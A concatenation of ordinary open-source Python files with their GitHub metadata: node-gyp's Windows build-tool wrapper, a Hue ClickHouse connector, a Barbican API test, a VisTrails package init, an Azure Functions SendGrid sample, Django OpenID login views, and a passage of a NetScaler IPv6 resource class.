"""Run manifest tool with environment set. Strip out undesirable warning
(some XML blocks are recognized by the OS loader, but not the manifest
tool)."""
env = self._GetEnv(arch)
popen = subprocess.Popen(args, shell=True, env=env,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = popen.communicate()
for line in out.splitlines():
if line and 'manifest authoring warning 81010002' not in line:
print(line)
return popen.returncode
def ExecManifestToRc(self, arch, *args):
"""Creates a resource file pointing a SxS assembly manifest.
|args| is tuple containing path to resource file, path to manifest file
and resource name which can be "1" (for executables) or "2" (for DLLs)."""
manifest_path, resource_path, resource_name = args
with open(resource_path, 'wb') as output:
output.write('#include <windows.h>\n%s RT_MANIFEST "%s"' % (
resource_name,
os.path.abspath(manifest_path).replace('\\', '/')))
def ExecMidlWrapper(self, arch, outdir, tlb, h, dlldata, iid, proxy, idl,
*flags):
"""Filter noisy filenames output from MIDL compile step that isn't
quietable via command line flags.
"""
args = ['midl', '/nologo'] + list(flags) + [
'/out', outdir,
'/tlb', tlb,
'/h', h,
'/dlldata', dlldata,
'/iid', iid,
'/proxy', proxy,
idl]
env = self._GetEnv(arch)
popen = subprocess.Popen(args, shell=True, env=env,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = popen.communicate()
# Filter junk out of stdout, and write filtered versions. Output we want
# to filter is pairs of lines that look like this:
# Processing C:\Program Files (x86)\Microsoft SDKs\...\include\objidl.idl
# objidl.idl
lines = out.splitlines()
prefixes = ('Processing ', '64 bit Processing ')
processing = set(os.path.basename(x)
for x in lines if x.startswith(prefixes))
for line in lines:
if not line.startswith(prefixes) and line not in processing:
print(line)
return popen.returncode
def ExecAsmWrapper(self, arch, *args):
"""Filter logo banner from invocations of asm.exe."""
env = self._GetEnv(arch)
popen = subprocess.Popen(args, shell=True, env=env,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = popen.communicate()
for line in out.splitlines():
if (not line.startswith('Copyright (C) Microsoft Corporation') and
not line.startswith('Microsoft (R) Macro Assembler') and
not line.startswith(' Assembling: ') and
line):
print(line)
return popen.returncode
def ExecRcWrapper(self, arch, *args):
"""Filter logo banner from invocations of rc.exe. Older versions of RC
don't support the /nologo flag."""
env = self._GetEnv(arch)
popen = subprocess.Popen(args, shell=True, env=env,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = popen.communicate()
for line in out.splitlines():
if (not line.startswith('Microsoft (R) Windows (R) Resource Compiler') and
not line.startswith('Copyright (C) Microsoft Corporation') and
line):
print(line)
return popen.returncode
def ExecActionWrapper(self, arch, rspfile, *dir):
"""Runs an action command line from a response file using the environment
for |arch|. If |dir| is supplied, use that as the working directory."""
env = self._GetEnv(arch)
# TODO(scottmg): This is a temporary hack to get some specific variables
# through to actions that are set after gyp-time. http://crbug.com/333738.
for k, v in os.environ.items():
if k not in env:
env[k] = v
args = open(rspfile).read()
dir = dir[0] if dir else None
return subprocess.call(args, shell=True, env=env, cwd=dir)
def ExecClCompile(self, project_dir, selected_files):
"""Executed by msvs-ninja projects when the 'ClCompile' target is used to
build selected C/C++ files."""
project_dir = os.path.relpath(project_dir, BASE_DIR)
selected_files = selected_files.split(';')
ninja_targets = [os.path.join(project_dir, filename) + '^^'
for filename in selected_files]
cmd = ['ninja.exe']
cmd.extend(ninja_targets)
return subprocess.call(cmd, shell=True, cwd=BASE_DIR)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| {
"content_hash": "74d5b16b5e278bf2941c4c54a2ce8f06",
"timestamp": "",
"source": "github",
"line_count": 310,
"max_line_length": 80,
"avg_line_length": 40.68064516129032,
"alnum_prop": 0.6346840060264848,
"repo_name": "refack/node-gyp",
"id": "bca0b9e346a5ba0763c044e9480248c42e9e65e3",
"size": "12791",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "gyp/pylib/gyp/win_tool.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "397"
},
{
"name": "C#",
"bytes": "9566"
},
{
"name": "C++",
"bytes": "1475"
},
{
"name": "Emacs Lisp",
"bytes": "14357"
},
{
"name": "JavaScript",
"bytes": "116850"
},
{
"name": "Python",
"bytes": "1246997"
},
{
"name": "Shell",
"bytes": "7180"
}
],
"symlink_target": ""
} |
from librdbms.jdbc import query_and_fetch
from notebook.connectors.jdbc import JdbcApi
from notebook.connectors.jdbc import Assist
class JdbcApiClickhouse(JdbcApi):
def _createAssist(self, db):
return ClickhouseAssist(db)
class ClickhouseAssist(Assist):
def get_databases(self):
dbs, description = query_and_fetch(self.db, 'SHOW DATABASES')
return [db[0] and db[0].strip() for db in dbs]
def get_tables_full(self, database, table_names=[]):
tables, description = query_and_fetch(self.db, "SELECT name, '' FROM system.tables WHERE database='%s'" % database)
return [{"comment": table[1] and table[1].strip(), "type": "Table", "name": table[0] and table[0].strip()} for table in tables]
def get_columns_full(self, database, table):
columns, description = query_and_fetch(self.db, "SELECT name, type, '' FROM system.columns WHERE database='%s' AND table = '%s'" % (database, table))
return [{"comment": col[2] and col[2].strip(), "type": col[1], "name": col[0] and col[0].strip()} for col in columns]
def get_sample_data(self, database, table, column=None):
column = column or '*'
return query_and_fetch(self.db, 'SELECT %s FROM %s.%s limit 100' % (column, database, table))
| {
"content_hash": "c2697962380bea0bb8232bfabc39a03e",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 153,
"avg_line_length": 47.11538461538461,
"alnum_prop": 0.6889795918367347,
"repo_name": "cloudera/hue",
"id": "0d16abb485d32c56cb1d8d0c2b6ada9c1a66f0f8",
"size": "2017",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "desktop/libs/notebook/src/notebook/connectors/jdbc_clickhouse.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ABAP",
"bytes": "962"
},
{
"name": "ActionScript",
"bytes": "1133"
},
{
"name": "Ada",
"bytes": "99"
},
{
"name": "Assembly",
"bytes": "2347"
},
{
"name": "AutoHotkey",
"bytes": "720"
},
{
"name": "BASIC",
"bytes": "2884"
},
{
"name": "Batchfile",
"bytes": "143575"
},
{
"name": "C",
"bytes": "5129166"
},
{
"name": "C#",
"bytes": "83"
},
{
"name": "C++",
"bytes": "718011"
},
{
"name": "COBOL",
"bytes": "4"
},
{
"name": "CSS",
"bytes": "680715"
},
{
"name": "Cirru",
"bytes": "520"
},
{
"name": "Clojure",
"bytes": "794"
},
{
"name": "Closure Templates",
"bytes": "1072"
},
{
"name": "CoffeeScript",
"bytes": "403"
},
{
"name": "ColdFusion",
"bytes": "86"
},
{
"name": "Common Lisp",
"bytes": "632"
},
{
"name": "Cython",
"bytes": "1016963"
},
{
"name": "D",
"bytes": "324"
},
{
"name": "Dart",
"bytes": "489"
},
{
"name": "Dockerfile",
"bytes": "13576"
},
{
"name": "EJS",
"bytes": "752"
},
{
"name": "Eiffel",
"bytes": "375"
},
{
"name": "Elixir",
"bytes": "692"
},
{
"name": "Elm",
"bytes": "487"
},
{
"name": "Emacs Lisp",
"bytes": "411907"
},
{
"name": "Erlang",
"bytes": "487"
},
{
"name": "Forth",
"bytes": "979"
},
{
"name": "FreeMarker",
"bytes": "1017"
},
{
"name": "G-code",
"bytes": "521"
},
{
"name": "GAP",
"bytes": "29873"
},
{
"name": "GLSL",
"bytes": "512"
},
{
"name": "Genshi",
"bytes": "946"
},
{
"name": "Gherkin",
"bytes": "699"
},
{
"name": "Go",
"bytes": "641"
},
{
"name": "Groovy",
"bytes": "1080"
},
{
"name": "HTML",
"bytes": "28328425"
},
{
"name": "Haml",
"bytes": "920"
},
{
"name": "Handlebars",
"bytes": "173"
},
{
"name": "Haskell",
"bytes": "512"
},
{
"name": "Haxe",
"bytes": "447"
},
{
"name": "HiveQL",
"bytes": "43"
},
{
"name": "Io",
"bytes": "140"
},
{
"name": "Java",
"bytes": "457398"
},
{
"name": "JavaScript",
"bytes": "39181239"
},
{
"name": "Jinja",
"bytes": "356"
},
{
"name": "Julia",
"bytes": "210"
},
{
"name": "LSL",
"bytes": "2080"
},
{
"name": "Lean",
"bytes": "213"
},
{
"name": "Less",
"bytes": "396102"
},
{
"name": "Lex",
"bytes": "218764"
},
{
"name": "Liquid",
"bytes": "1883"
},
{
"name": "LiveScript",
"bytes": "5747"
},
{
"name": "Lua",
"bytes": "78382"
},
{
"name": "M4",
"bytes": "1751"
},
{
"name": "MATLAB",
"bytes": "203"
},
{
"name": "Makefile",
"bytes": "1025937"
},
{
"name": "Mako",
"bytes": "3644004"
},
{
"name": "Mask",
"bytes": "597"
},
{
"name": "Myghty",
"bytes": "936"
},
{
"name": "Nix",
"bytes": "2212"
},
{
"name": "OCaml",
"bytes": "539"
},
{
"name": "Objective-C",
"bytes": "2672"
},
{
"name": "OpenSCAD",
"bytes": "333"
},
{
"name": "PHP",
"bytes": "662"
},
{
"name": "PLSQL",
"bytes": "29403"
},
{
"name": "PLpgSQL",
"bytes": "6006"
},
{
"name": "Pascal",
"bytes": "84273"
},
{
"name": "Perl",
"bytes": "4327"
},
{
"name": "PigLatin",
"bytes": "371"
},
{
"name": "PowerShell",
"bytes": "6235"
},
{
"name": "Procfile",
"bytes": "47"
},
{
"name": "Pug",
"bytes": "584"
},
{
"name": "Python",
"bytes": "92881549"
},
{
"name": "R",
"bytes": "2445"
},
{
"name": "Roff",
"bytes": "484108"
},
{
"name": "Ruby",
"bytes": "1098"
},
{
"name": "Rust",
"bytes": "495"
},
{
"name": "SCSS",
"bytes": "78508"
},
{
"name": "Sass",
"bytes": "770"
},
{
"name": "Scala",
"bytes": "1541"
},
{
"name": "Scheme",
"bytes": "559"
},
{
"name": "Shell",
"bytes": "249165"
},
{
"name": "Smarty",
"bytes": "130"
},
{
"name": "SourcePawn",
"bytes": "948"
},
{
"name": "Stylus",
"bytes": "682"
},
{
"name": "Tcl",
"bytes": "899"
},
{
"name": "TeX",
"bytes": "165743"
},
{
"name": "Thrift",
"bytes": "341963"
},
{
"name": "Twig",
"bytes": "761"
},
{
"name": "TypeScript",
"bytes": "1241396"
},
{
"name": "VBScript",
"bytes": "938"
},
{
"name": "VHDL",
"bytes": "830"
},
{
"name": "Vala",
"bytes": "485"
},
{
"name": "Verilog",
"bytes": "274"
},
{
"name": "Vim Snippet",
"bytes": "226931"
},
{
"name": "Vue",
"bytes": "350385"
},
{
"name": "XQuery",
"bytes": "114"
},
{
"name": "XSLT",
"bytes": "522199"
},
{
"name": "Yacc",
"bytes": "1070437"
},
{
"name": "jq",
"bytes": "4"
}
],
"symlink_target": ""
} |
from functionaltests.api import base
class VersionDiscoveryTestCase(base.TestCase):
def test_version_get_as_unauthenticated(self):
"""Covers retrieving version as unauthenticated user."""
self._do_version_test(use_auth=False)
def test_version_get_as_authenticated(self):
"""Covers retrieving version as authenticated user."""
self._do_version_test(use_auth=True)
def _do_version_test(self, use_auth=False):
"""Get version string with or without authentication.
:param use_auth: True to use authentication, False otherwise. Default
is False
"""
url_without_version = self.client.get_base_url(include_version=False)
resp = self.client.get(url_without_version, use_auth=use_auth)
body = resp.json()
self.assertEqual(300, resp.status_code)
versions_response = body['versions']['values']
v1_info = versions_response[0]
# NOTE(jaosorior): I used assertIn instead of assertEqual because we
# might start using decimal numbers in the future. So when that happens
# this test will still be valid.
self.assertIn('v1', v1_info['id'])
self.assertEqual(1, len(v1_info['media-types']))
self.assertEqual('application/json', v1_info['media-types'][0]['base'])
| {
"content_hash": "58446df4a3300309e191e8487067f84c",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 79,
"avg_line_length": 40.15151515151515,
"alnum_prop": 0.6618867924528302,
"repo_name": "openstack/barbican",
"id": "3501b4dcf5887f68359c3ebe7ebdee2f895a3029",
"size": "1909",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "functionaltests/api/v1/smoke/test_versions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "API Blueprint",
"bytes": "1586"
},
{
"name": "Mako",
"bytes": "979"
},
{
"name": "Python",
"bytes": "2626403"
},
{
"name": "Shell",
"bytes": "43567"
}
],
"symlink_target": ""
} |
"""Maps package for VisTrails.
This package uses the Google Maps API to display information using
Qt's WebKit in the spreadsheet.
"""
# 2014-02-04 -- 0.1.0
# * Package created (from existing local work from 2013)
from __future__ import division
from identifiers import *
def package_dependencies():
return ['org.vistrails.vistrails.tabledata',
'org.vistrails.vistrails.spreadsheet']
| {
"content_hash": "cb49ffede0d46d57c5858bd631945cc1",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 66,
"avg_line_length": 21.526315789473685,
"alnum_prop": 0.7163814180929096,
"repo_name": "VisTrails/VisTrails",
"id": "2ab5042d74a64b99af7012ef44713f7e5edd06d8",
"size": "2323",
"binary": false,
"copies": "2",
"ref": "refs/heads/v2.2",
"path": "vistrails/packages/gmaps/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1129"
},
{
"name": "Makefile",
"bytes": "768"
},
{
"name": "Mako",
"bytes": "66613"
},
{
"name": "PHP",
"bytes": "49302"
},
{
"name": "Python",
"bytes": "19779006"
},
{
"name": "R",
"bytes": "782836"
},
{
"name": "Ruby",
"bytes": "875"
},
{
"name": "SQLPL",
"bytes": "2323"
},
{
"name": "Shell",
"bytes": "26542"
},
{
"name": "TeX",
"bytes": "147247"
},
{
"name": "XSLT",
"bytes": "1090"
}
],
"symlink_target": ""
} |
"""
Azure Functions Queue Trigger Python Sample that send email by using SendGrid bindings.
SendGrid binding reference:
https://docs.microsoft.com/en-us/azure/azure-functions/functions-bindings-sendgrid
"""
import os, json
_AZURE_FUNCTION_QUEUE_INPUT_ENV_NAME = "inputMessage"
_AZURE_FUNCTION_SENDGRID_OUTPUT_ENV_NAME = "outputMessage"
_SENDGRID_EMAIL_TO = "[email protected]"
_SENDGRID_EMAIL_SUBJECT = "Mail Subject"
# read the queue message
messageText = open(os.environ[_AZURE_FUNCTION_QUEUE_INPUT_ENV_NAME]).read()
print("Function script processed queue message '{0}'".format(messageText))
outmsg={
"personalizations": [
{
"to": [{ "email": _SENDGRID_EMAIL_TO }]
}
],
"subject": _SENDGRID_EMAIL_SUBJECT,
"content": [
{
"type": 'text/plain',
"value": messageText
}
]
}
# Send email using SendGrid (output name: outputMessage)
print('Sending email using SendGrid:', outmsg)
with open(os.environ[_AZURE_FUNCTION_SENDGRID_OUTPUT_ENV_NAME], 'wb') as f:
json.dump(outmsg,f)
| {
"content_hash": "3c0f56c0932419477b2b908a070bf4c1",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 87,
"avg_line_length": 29.054054054054053,
"alnum_prop": 0.6753488372093023,
"repo_name": "yokawasa/azure-functions-python-samples",
"id": "b7760023ce979f926727bf6b11189b88d4d7e910",
"size": "1099",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "v1functions/queue-trigger-sendgrid/function/run.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "206"
},
{
"name": "HTML",
"bytes": "95"
},
{
"name": "Python",
"bytes": "43036"
},
{
"name": "Shell",
"bytes": "18052"
}
],
"symlink_target": ""
} |
import json
# django imports
from django.contrib.auth import authenticate, login, logout
#from django.contrib.auth.views import authenticate, login, logout
from django.shortcuts import render_to_response, RequestContext, HttpResponse, redirect
from django.core.urlresolvers import reverse
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.forms import AuthenticationForm
# local imports
from forms import CustomUserCreationForm, LoginUsernameForm
def home(request):
return HttpResponse("This is the opend_id target for MM. Please specify a url like: id.mm.is/USERNAME ")
def create(request):
"""
"""
print "inside create"
if request.method == 'POST': # If the form has been submitted...
form = CustomUserCreationForm(request.POST) # A form bound to the POST data
if form.is_valid(): # All validation rules pass
print "form is valid"
# CreatingUser
# ...
user = form.save(commit=True)
password = form.cleaned_data['password1']
# request.POST['password1'] = request.POST['password2']
auth_user = authenticate(username=user.username, password=password)
if auth_user is not None:
login(request, auth_user)
if user.first_name and user.last_name:
response_data = {
"username": user.username,
"email": user.email,
"first_name": user.first_name,
"last_name": user.last_name,
}
else:
response_data = {
"username": user.username,
"email": user.email,
}
return HttpResponse(json.dumps(response_data), content_type="application/json")
else:
response_data = {
"err": dict(form.errors.items())
}
return HttpResponse(json.dumps(response_data), content_type="application/json")
#return redirect("mm_login")
#return HttpResponse("Got User form, user is %s" % user.username)
#return HttpResponseRedirect('/thanks/') # Redirect after POST
else:
form = CustomUserCreationForm() # An unbound form
return render_to_response('registration/create.html', {
'form': form},
context_instance = RequestContext(request)
)
def mm_login(request):
"""
Login function
"""
if request.method == 'POST':
login_form = LoginUsernameForm(request.POST)
if login_form.is_valid():
username = login_form.cleaned_data['username']
password = login_form.cleaned_data['password']
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
if user.first_name and user.last_name:
response_data = {
"username": user.username,
"email": user.email,
"first_name": user.first_name,
"last_name": user.last_name,
}
else:
response_data = {
"username": user.username,
"email": user.email,
}
return HttpResponse(json.dumps(response_data), content_type="application/json")
else:
response_data = {
"err": "Your username and password didn't match. Please try again."
}
return HttpResponse(json.dumps(response_data), content_type="application/json")
else:
login_form = LoginUsernameForm()
context = {
"form": login_form,
}
return render_to_response('registration/login.html', context, RequestContext(request))
| {
"content_hash": "580acf10136e4af5c65a78e70e1506e4",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 109,
"avg_line_length": 40.43434343434343,
"alnum_prop": 0.5578316262802898,
"repo_name": "Bergurth/new-openid-server",
"id": "1b7a4357ae1c844e7057fb9517688b46b43b8c4f",
"size": "4084",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "openid_1_8/users/views.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "2644"
},
{
"name": "Python",
"bytes": "13689"
}
],
"symlink_target": ""
} |
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class nsip6(base_resource) :
""" Configuration for ip6 resource. """
def __init__(self) :
self._ipv6address = ""
self._scope = ""
self._type = ""
self._vlan = 0
self._nd = ""
self._icmp = ""
self._vserver = ""
self._telnet = ""
self._ftp = ""
self._gui = ""
self._ssh = ""
self._snmp = ""
self._mgmtaccess = ""
self._restrictaccess = ""
self._dynamicrouting = ""
self._hostroute = ""
self._ip6hostrtgw = ""
self._metric = 0
self._vserverrhilevel = ""
self._ospf6lsatype = ""
self._ospfarea = 0
self._state = ""
self._map = ""
self._ownernode = 0
self._td = 0
self._iptype = []
self._curstate = ""
self._viprtadv2bsd = False
self._vipvsercount = 0
self._vipvserdowncount = 0
self._systemtype = ""
self.___count = 0
@property
def ipv6address(self) :
ur"""IPv6 address to create on the NetScaler appliance.<br/>Minimum length = 1.
"""
try :
return self._ipv6address
except Exception as e:
raise e
@ipv6address.setter
def ipv6address(self, ipv6address) :
ur"""IPv6 address to create on the NetScaler appliance.<br/>Minimum length = 1
"""
try :
self._ipv6address = ipv6address
except Exception as e:
raise e
@property
def scope(self) :
ur"""Scope of the IPv6 address to be created. Cannot be changed after the IP address is created.<br/>Default value: global<br/>Possible values = global, link-local.
"""
try :
return self._scope
except Exception as e:
raise e
@scope.setter
def scope(self, scope) :
ur"""Scope of the IPv6 address to be created. Cannot be changed after the IP address is created.<br/>Default value: global<br/>Possible values = global, link-local
"""
try :
self._scope = scope
except Exception as e:
raise e
@property
def type(self) :
ur"""Type of IP address to be created on the NetScaler appliance. Cannot be changed after the IP address is created.<br/>Default value: SNIP<br/>Possible values = NSIP, VIP, SNIP, GSLBsiteIP, ADNSsvcIP, CLIP.
"""
try :
return self._type
except Exception as e:
raise e
@type.setter
def type(self, type) :
ur"""Type of IP address to be created on the NetScaler appliance. Cannot be changed after the IP address is created.<br/>Default value: SNIP<br/>Possible values = NSIP, VIP, SNIP, GSLBsiteIP, ADNSsvcIP, CLIP
"""
try :
self._type = type
except Exception as e:
raise e
@property
def vlan(self) :
ur"""The VLAN number.<br/>Default value: 0<br/>Maximum length = 4094.
"""
try :
return self._vlan
except Exception as e:
raise e
@vlan.setter
def vlan(self, vlan) :
ur"""The VLAN number.<br/>Default value: 0<br/>Maximum length = 4094
"""
try :
self._vlan = vlan
except Exception as e:
raise e
@property
def nd(self) :
ur"""Respond to Neighbor Discovery (ND) requests for this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._nd
except Exception as e:
raise e
@nd.setter
def nd(self, nd) :
ur"""Respond to Neighbor Discovery (ND) requests for this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._nd = nd
except Exception as e:
raise e
@property
def icmp(self) :
ur"""Respond to ICMP requests for this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._icmp
except Exception as e:
raise e
@icmp.setter
def icmp(self, icmp) :
ur"""Respond to ICMP requests for this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._icmp = icmp
except Exception as e:
raise e
@property
def vserver(self) :
ur"""Enable or disable the state of all the virtual servers associated with this VIP6 address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._vserver
except Exception as e:
raise e
@vserver.setter
def vserver(self, vserver) :
ur"""Enable or disable the state of all the virtual servers associated with this VIP6 address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._vserver = vserver
except Exception as e:
raise e
@property
def telnet(self) :
ur"""Allow Telnet access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._telnet
except Exception as e:
raise e
@telnet.setter
def telnet(self, telnet) :
ur"""Allow Telnet access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._telnet = telnet
except Exception as e:
raise e
@property
def ftp(self) :
ur"""Allow File Transfer Protocol (FTP) access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._ftp
except Exception as e:
raise e
@ftp.setter
def ftp(self, ftp) :
ur"""Allow File Transfer Protocol (FTP) access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._ftp = ftp
except Exception as e:
raise e
@property
def gui(self) :
ur"""Allow graphical user interface (GUI) access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, SECUREONLY, DISABLED.
"""
try :
return self._gui
except Exception as e:
raise e
@gui.setter
def gui(self, gui) :
ur"""Allow graphical user interface (GUI) access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, SECUREONLY, DISABLED
"""
try :
self._gui = gui
except Exception as e:
raise e
@property
def ssh(self) :
ur"""Allow secure Shell (SSH) access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._ssh
except Exception as e:
raise e
@ssh.setter
def ssh(self, ssh) :
ur"""Allow secure Shell (SSH) access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._ssh = ssh
except Exception as e:
raise e
@property
def snmp(self) :
ur"""Allow Simple Network Management Protocol (SNMP) access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._snmp
except Exception as e:
raise e
@snmp.setter
def snmp(self, snmp) :
ur"""Allow Simple Network Management Protocol (SNMP) access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._snmp = snmp
except Exception as e:
raise e
@property
def mgmtaccess(self) :
ur"""Allow access to management applications on this IP address.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._mgmtaccess
except Exception as e:
raise e
@mgmtaccess.setter
def mgmtaccess(self, mgmtaccess) :
ur"""Allow access to management applications on this IP address.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._mgmtaccess = mgmtaccess
except Exception as e:
raise e
@property
def restrictaccess(self) :
ur"""Block access to nonmanagement applications on this IP address. This option is applicable forMIP6s, SNIP6s, and NSIP6s, and is disabled by default. Nonmanagement applications can run on the underlying NetScaler Free BSD operating system.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._restrictaccess
except Exception as e:
raise e
@restrictaccess.setter
def restrictaccess(self, restrictaccess) :
ur"""Block access to nonmanagement applications on this IP address. This option is applicable forMIP6s, SNIP6s, and NSIP6s, and is disabled by default. Nonmanagement applications can run on the underlying NetScaler Free BSD operating system.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._restrictaccess = restrictaccess
except Exception as e:
raise e
@property
def dynamicrouting(self) :
ur"""Allow dynamic routing on this IP address. Specific to Subnet IPv6 (SNIP6) address.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._dynamicrouting
except Exception as e:
raise e
@dynamicrouting.setter
def dynamicrouting(self, dynamicrouting) :
ur"""Allow dynamic routing on this IP address. Specific to Subnet IPv6 (SNIP6) address.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._dynamicrouting = dynamicrouting
except Exception as e:
raise e
@property
def hostroute(self) :
ur"""Advertise a route for the VIP6 address by using the dynamic routing protocols running on the NetScaler appliance.<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._hostroute
except Exception as e:
raise e
@hostroute.setter
def hostroute(self, hostroute) :
ur"""Advertise a route for the VIP6 address by using the dynamic routing protocols running on the NetScaler appliance.<br/>Possible values = ENABLED, DISABLED
"""
try :
self._hostroute = hostroute
except Exception as e:
raise e
@property
def ip6hostrtgw(self) :
ur"""IPv6 address of the gateway for the route. If Gateway is not set, VIP uses :: as the gateway.<br/>Default value: 0.
"""
try :
return self._ip6hostrtgw
except Exception as e:
raise e
@ip6hostrtgw.setter
def ip6hostrtgw(self, ip6hostrtgw) :
ur"""IPv6 address of the gateway for the route. If Gateway is not set, VIP uses :: as the gateway.<br/>Default value: 0
"""
try :
self._ip6hostrtgw = ip6hostrtgw
except Exception as e:
raise e
@property
def metric(self) :
ur"""Integer value to add to or subtract from the cost of the route advertised for the VIP6 address.<br/>Minimum length = -16777215.
"""
try :
return self._metric
except Exception as e:
raise e
@metric.setter
def metric(self, metric) :
ur"""Integer value to add to or subtract from the cost of the route advertised for the VIP6 address.<br/>Minimum length = -16777215
"""
try :
self._metric = metric
except Exception as e:
raise e
@property
def vserverrhilevel(self) :
ur"""Advertise or do not advertise the route for the Virtual IP (VIP6) address on the basis of the state of the virtual servers associated with that VIP6.
* NONE - Advertise the route for the VIP6 address, irrespective of the state of the virtual servers associated with the address.
* ONE VSERVER - Advertise the route for the VIP6 address if at least one of the associated virtual servers is in UP state.
* ALL VSERVER - Advertise the route for the VIP6 address if all of the associated virtual servers are in UP state.
* VSVR_CNTRLD. Advertise the route for the VIP address according to the RHIstate (RHI STATE) parameter setting on all the associated virtual servers of the VIP address along with their states.
When Vserver RHI Level (RHI) parameter is set to VSVR_CNTRLD, the following are different RHI behaviors for the VIP address on the basis of RHIstate (RHI STATE) settings on the virtual servers associated with the VIP address:
* If you set RHI STATE to PASSIVE on all virtual servers, the NetScaler ADC always advertises the route for the VIP address.
* If you set RHI STATE to ACTIVE on all virtual servers, the NetScaler ADC advertises the route for the VIP address if at least one of the associated virtual servers is in UP state.
*If you set RHI STATE to ACTIVE on some and PASSIVE on others, the NetScaler ADC advertises the route for the VIP address if at least one of the associated virtual servers, whose RHI STATE set to ACTIVE, is in UP state.<br/>Default value: ONE_VSERVER<br/>Possible values = ONE_VSERVER, ALL_VSERVERS, NONE, VSVR_CNTRLD.
"""
try :
return self._vserverrhilevel
except Exception as e:
raise e
@vserverrhilevel.setter
def vserverrhilevel(self, vserverrhilevel) :
ur"""Advertise or do not advertise the route for the Virtual IP (VIP6) address on the basis of the state of the virtual servers associated with that VIP6.
* NONE - Advertise the route for the VIP6 address, irrespective of the state of the virtual servers associated with the address.
* ONE VSERVER - Advertise the route for the VIP6 address if at least one of the associated virtual servers is in UP state.
* ALL VSERVER - Advertise the route for the VIP6 address if all of the associated virtual servers are in UP state.
* VSVR_CNTRLD. Advertise the route for the VIP address according to the RHIstate (RHI STATE) parameter setting on all the associated virtual servers of the VIP address along with their states.
When Vserver RHI Level (RHI) parameter is set to VSVR_CNTRLD, the following are different RHI behaviors for the VIP address on the basis of RHIstate (RHI STATE) settings on the virtual servers associated with the VIP address:
* If you set RHI STATE to PASSIVE on all virtual servers, the NetScaler ADC always advertises the route for the VIP address.
* If you set RHI STATE to ACTIVE on all virtual servers, the NetScaler ADC advertises the route for the VIP address if at least one of the associated virtual servers is in UP state.
*If you set RHI STATE to ACTIVE on some and PASSIVE on others, the NetScaler ADC advertises the route for the VIP address if at least one of the associated virtual servers, whose RHI STATE set to ACTIVE, is in UP state.<br/>Default value: ONE_VSERVER<br/>Possible values = ONE_VSERVER, ALL_VSERVERS, NONE, VSVR_CNTRLD
"""
try :
self._vserverrhilevel = vserverrhilevel
except Exception as e:
raise e
@property
def ospf6lsatype(self) :
ur"""Type of LSAs to be used by the IPv6 OSPF protocol, running on the NetScaler appliance, for advertising the route for the VIP6 address.<br/>Default value: EXTERNAL<br/>Possible values = INTRA_AREA, EXTERNAL.
"""
try :
return self._ospf6lsatype
except Exception as e:
raise e
@ospf6lsatype.setter
def ospf6lsatype(self, ospf6lsatype) :
